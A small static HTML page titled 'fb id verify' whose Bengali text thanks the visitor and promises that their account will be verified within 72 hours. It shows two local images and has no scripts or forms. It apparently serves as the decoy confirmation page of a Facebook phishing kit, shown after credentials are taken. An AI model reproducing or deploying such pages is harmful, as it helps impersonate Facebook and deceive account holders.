 <html>
   <head>
     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1"/>
     <title> fb id verify </title>
     <style>
       body{
  background-color: #00FF7F;
  border: 4px black solid;
  padding: 10px;
  margin: 5px;
  width: auto;
  text-align: center;
         
       }
     </style>
     
     
     </head>
     <body>
<meta name="viewport" content="initial-scale=1, width= 0 ">
  <meta name="referrer" content="default" id="meta_referrer">
<center>
<br>
<h1 style="color:red">ধন্যবাদ!! 
<h1 style="color: blue">আমরা আপনার একাউন্টটি ৭২ ঘন্টার মধ্যে Verify করে দিবো।
 <h1> দয়া করে ততক্ষণ পর্যন্ত অপেক্ষা করুন।<br><br> 
<center><table border="1" align= "center"><tr><td><img src="img/m.jpg" align= "center" width= "300" height =""></td></tr></table>
<br><table border="1" align= "center"><tr><td><img src="img/c.jpg" align= "center" width= "300" height =""></td></tr></table></h1><br>
</body></html>